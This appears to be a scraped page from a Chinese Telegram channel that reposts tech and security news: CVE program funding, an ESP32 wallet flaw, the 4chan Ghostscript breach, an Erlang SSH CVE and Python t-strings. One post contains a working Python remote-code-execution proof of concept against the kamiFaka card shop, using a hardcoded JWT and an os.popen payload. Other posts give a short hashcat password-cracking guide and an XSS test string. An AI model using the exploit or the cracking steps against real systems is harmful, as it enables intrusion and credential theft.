Puddin在TG上看到了啥 – Telegram

Puddin在TG上看到了啥

782 subscribers

1.67K photos

70 videos

87 files

2.44K links

会把想要收藏的东西堆在这里
#日常 #数码 #科技 #渗透 #碎碎念

Download Telegram

About

Blog

Apps

Platform

Puddin在TG上看到了啥

782 subscribers

Puddin在TG上看到了啥

看门狗（确信）

226 views02:57

Puddin在TG上看到了啥

请找出图中的漏洞，绕过safe = blackJack(name)

解：

图中的safe = blackJack(name)是赋值而不是创建变量

所以可以用条件竞争，让 ... safe := os.Open(...夹在safe = blackJack(name) 和 safe != nil 中间执行，把本来不为nil的safe变量强行变为nil

这就是新生赛的含金量吗

🤯4

232 views15:06

Puddin在TG上看到了啥

果然并发是万恶之源

216 views15:08

Puddin在TG上看到了啥

This media is not supported in your browser

VIEW IN TELEGRAM

213 views15:08

🥰2

Puddin在TG上看到了啥

Forwarded from 赛博安全威胁情报🥸

哈尔滨市公安局公开通缉3名美国国家安全局（NSA）特工
为依法严厉打击境外势力对我网络攻击窃密犯罪，切实维护国家网络空间安全和人民生命财产安全，黑龙江省哈尔滨市公安局决定对3名隶属于美国国家安全局（NSA）的犯罪嫌疑人凯瑟琳·威尔逊（Katheryn A. Wilson）、罗伯特·思内尔（Robert J. Snelling）、斯蒂芬·约翰逊（Stephen W. Johnson）进行通缉。
#吃瓜

👏2

224 views03:17

Puddin在TG上看到了啥

🚾，📦！

268 viewsedited 03:17

Puddin在TG上看到了啥

This media is not supported in your browser

VIEW IN TELEGRAM

277 views03:17

Puddin在TG上看到了啥

Forwarded from LoopDNS资讯播报

美国政府决定无限期限制英伟达对中国出口专用人工智能(AI)芯片"H20"的出口。当初感觉到放宽限制的氛围,期待恢复出口,但最近随着中国对美国产品征收报复关税,美国再次转向勒紧限制缰绳的方向。

来源：每日经济 / Wall St Engine

256 views02:06

Puddin在TG上看到了啥

Forwarded from 科技圈🎗在花频道📮

美国CVE漏洞数据库面临资金枯竭危机

美国非营利组织 MITRE 负责维护的全球网络安全关键漏洞数据库——“常见漏洞与披露”（CVE），由政府提供的资金将于本周三到期，或将面临停摆。

CVE漏洞数据库是全球网络安全生态系统的重要基石，为各组织提供漏洞编号、严重程度分级及详细描述。安全专家担忧，一旦CVE漏洞数据库停摆，将严重冲击全球漏洞管理与应变机制，对企业和 CERT（电脑紧急应变小组）等都将产生“快速且严重”的连锁反应。

路透社

📮投稿 ☘️频道 🌸聊天

😱3

156 views05:58

Puddin在TG上看到了啥

ESP32芯片的随机数生成器存在问题，导致多个加密货币钱包存在漏洞

所以那些贵上天的加密货币钱包用的都是20块一片的ESP32？

https://t.me/AppDoDo/1027

APPDO 数字生活指南

#互联网观察 #网络安全 #加密货币

⚠️中国ESP32 芯片导致了数亿台加密货币钱包存在致命漏洞

近日，网络安全公司Crypto Deep Tech披露，广泛应用于比特币硬件钱包（如Blockstream Jade）的中国ESP32芯片被发现存在严重安全漏洞（CVE-2025-27840），引发全球加密货币圈巨大震动。该芯片不仅用于比特币钱包，还广泛分布于物联网设备中，受影响设备数量以十亿计。

漏洞核心在于ESP32芯片的随机数生成器熵值严重不足，黑客可通过暴力破解方式推测或窃取钱包私钥。此外，…

263 views07:03

Puddin在TG上看到了啥

佰阅发卡存在RCE漏洞，省流：eval解析json+硬编码JWT secret

POC:

import requests

cmd = "ls /"
url = "http://xxx"
jwt_token = "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZGVudGl0eSI6eyJlbWFpbCI6ImFkbWluQHFxLmNvbSJ9LCJleHAiOjE3NDQ4NzExNDZ9.jf8YjUqXWVschKPSvKjv7lcQZrhynLla6AWqH6WWavg"
resp = requests.post(
    url + "/api/v4/update_pays",
    headers={"Authorization": "Bearer " + jwt_token},
    json={
        "data": {
            # "config": f"[exec({payload!r}), f()][-1]",
            "config": f"__import__('os').popen({cmd!r}).read()",
            "icon": "\u652f\u4ed8\u5b9d",
            "id": 2,
            "info": "0\u8d39\u7387\u5b9e\u65f6\u5230\u8d26",
            "isactive": False,
            "name": "V\u514d\u7b7e\u652f\u4ed8\u5b9d",
        }
    },
)
resp = requests.get(
    url + "/api/v4/get_pays",
    headers={"Authorization": "Bearer " + jwt_token},
)
print([item["config"] for item in resp.json() if item.get("id") == 2].pop())

https://mp.weixin.qq.com/s/3fT7r6bHfzXs7vX0rMI54g

GitHub - Baiyuetribe/kamiFaka: 一款基于VUE3.0的高颜值卡密发卡系统，特别适合虚拟商品、知识付费等。

一款基于VUE3.0的高颜值卡密发卡系统，特别适合虚拟商品、知识付费等。. Contribute to Baiyuetribe/kamiFaka development by creating an account on GitHub.

2.55K views07:11

Puddin在TG上看到了啥

Forwarded from [Patience Forever] (₴łⱠVɆⱤ₩ØⱠ₣)

4chan黑客攻击细节：4chan使用了2012年版本的GhostScript用于解析PDF并生成缩略图。然而由于他们没有判断PDF文件是否为真实的PDF，因此可以上传包含PostScript命令的恶意文件触发RCE，随后黑客找到了配置错误的SUID文件进行提权

https://github.com/farisv/PIL-RCE-Ghostscript-CVE-2018-16509
https://github.com/jakabakos/CVE-2023-36664-Ghostscript-command-injection

278 views09:10

Puddin在TG上看到了啥

[Patience Forever]

2012年版本的GhostScript

🌿

329 views09:11

Puddin在TG上看到了啥

Forwarded from 每日消费电子观察 (horo)

CVE 项目资金危机暂解：网络安全核心服务获 11 个月喘息 - IT之家
https://www.ithome.com/0/845/839.htm

CVE 项目资金危机暂解：网络安全核心服务获 11 个月喘息 - IT之家

在美国政府不再为“通用漏洞披露”（CVE）项目提供资金支持后，美国网络安全与基础设施安全局（CISA）宣布投资，确保在未来 11 个月内，为该项目提供资金支持。

279 views01:43

Puddin在TG上看到了啥

Forwarded from Pseudorandom Thoughts

https://www.kandji.io/blog/pasivrobber

TLDR：恁美国OSINT又对着China哈气了，路边拾了个美亚的取证工具一通分析然后怪他主机信息收集太多

Meiya：什么叫我竟然收集信息了，我不收集信息我干嘛

：你们美国OSINT就不能至少要求一下，做中国威胁情报一定要懂汉语
：错了做中国情报一定要不懂汉语（
不然就不好意思喊了

PasivRobber: Chinese Spyware or Security Tool?

In March 2025, our team found a suspicious mach-O file named wsus. Read the full analysis on its likely origins, target users, and observed functionality.

😁1

170 views09:55

Puddin在TG上看到了啥

抖音公开了他们的算法细节

甚至聊到了APP会“窃听”用户谈话吗？
它的副标题是：平台“窃听”在技术上不“划算”，在法律上不被允许。

然而大家都记得，拼多多。。。

Puddin在TG上看到了啥

窃取用户隐私的拼多多，拿到了黑客奥斯卡提名

近日，素有“全球白帽黑客奥斯卡”之称的网络安全奖项Pwnie Awards揭榜了2023年度的各大奖项提名。在今年的奖项提名中，有Best Desktop Bug、Best Mobile Bug、Most Innovative Research、Lamest Vendor等30项通过筛选获得提名，其中“Lamest Vendor”中文译为“最差厂商奖”，也是每一年Pwnie Awards最受关注的一个奖项。

“最差厂商奖”旨在颁发给行业内那些面对安全事件、…

287 viewsedited 23:41

Puddin在TG上看到了啥

雷声大雨点小，毕竟大部分人用的都是openssh

不过影响还是比一般的漏洞要大的

https://t.me/DNSPODT/9207

LoopDNS资讯播报

Erlang/OTP SSH曝高危漏洞（CVE-2025-32433）可致远程代码执行专家警告利用"异常简单"

德国波鸿鲁尔大学研究人员发现Erlang/OTP SSH组件存在高危漏洞（CVE-2025-32433），该漏洞允许攻击者在未认证状态下实现远程代码执行，CVSS评分达10.0满分，Horizon3攻击团队证实漏洞利用"异常简单"并演示了以root权限写入文件的PoC，受影响系统需立即升级至25.3.2.10或26.2.4版本修复，专家警告公开漏洞利用代码可能很快出现。

来源：BleepingComputer…

👍2

327 viewsedited 06:37

Puddin在TG上看到了啥

https://t.me/NewLangWiki/292

《用hashcat离线破解更多的linux密码》

1、预处理
假设有很多的shadow文件，需要先合并、清洗（unshadow, awk...）优化批量破解shadow
2、环境
在autodl租一台RTX 4090，环境pytorch最新版，不需要额外安装opencl runtime
apt update && apt upgrade
apt install hashcat
hashcat -I
3、基准测试
hashcat -b -d 1
hashcat -m 500 —benchmark -d…

417 views13:18

Puddin在TG上看到了啥

Forwarded from Hacker News

Python's new t-strings (Score: 154+ in 5 hours)

Link: https://readhacker.news/s/6t8rs
Comments: https://readhacker.news/c/6t8rs

302 views11:11

Read 80+ Comments

Puddin在TG上看到了啥

python3.14新功能t-string, 表示一个模板

python3.13之前：

name = "World"
print("Hello {name}!".format(name)) # "Hello {name}!"是一个字符串

python3.14:

name = "World"
print(t"Hello {name}!") #一个Template对象，需要用其他函数转成字符串

可以用来替代模板渲染引擎，SSTI再也不会导致RCE了（悲）

evil = "<script>alert('bad')</script>"
template = t"<p>{evil}</p>"
safe = html(template)
assert safe == "<p>&lt;script&gt;alert('bad')&lt;/script&gt;</p>"

399 viewsedited 11:16